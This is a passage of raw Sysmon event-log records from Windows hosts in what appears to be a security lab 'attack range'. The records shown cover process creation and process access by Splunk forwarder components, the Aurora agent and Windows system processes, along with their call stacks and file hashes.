Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015836Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.883{E5A8D418-E3D4-63C7-F301-00000000B002}3556C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000015835Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.525{E5A8D418-E3D4-63C7-F201-00000000B002}37003792C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+610325|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60fe56|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60943|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+60f97|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+9e7f20|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015834Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.415{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E3D4-63C7-F201-00000000B002}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015833Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.414{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E3D4-63C7-F201-00000000B002}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015832Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.414{E5A8D418-DC44-63C7-1C00-00000000B002}20203028C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-E3D4-63C7-F201-00000000B002}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013180190) 10341000x800000000000000015831Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E3D4-63C7-F201-00000000B002}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015830Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015829Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015828Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015827Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015826Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015825Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015824Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015823Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015822Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015821Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DC43-63C7-0500-00000000B002}416964C:\Windows\system32\csrss.exe{E5A8D418-E3D4-63C7-F201-00000000B002}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015820Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.294{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E3D4-63C7-F201-00000000B002}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015819Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.295{E5A8D418-E3D4-63C7-F201-00000000B002}3700C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.2.5Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=C8BED8D054FDE4C4222F39C750539874,SHA256=765D1E768D7027343C681DF3B2F6113ED0337F7179CDAE9CF89979A8725CE490,IMPHASH=5DCBAD7446F97D73DA1DA121D8CD8778{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000015818Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:19:32.158{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F986A0AFCC441755A35D5FC5A3CBCC0,SHA256=3B46854CE4BF6A1AEC6D2532C60159B3A4F9E1C299F4B536E1B720BA55B49D4D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000041042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.584{FE4C2B44-E3D4-63C7-1606-00000000AF02}53406820C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E3D4-63C7-1606-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E3D4-63C7-1606-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.444{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E3D4-63C7-1606-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:19:32.446{FE4C2B44-E3D4-63C7-1606-00000000AF02}5340C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 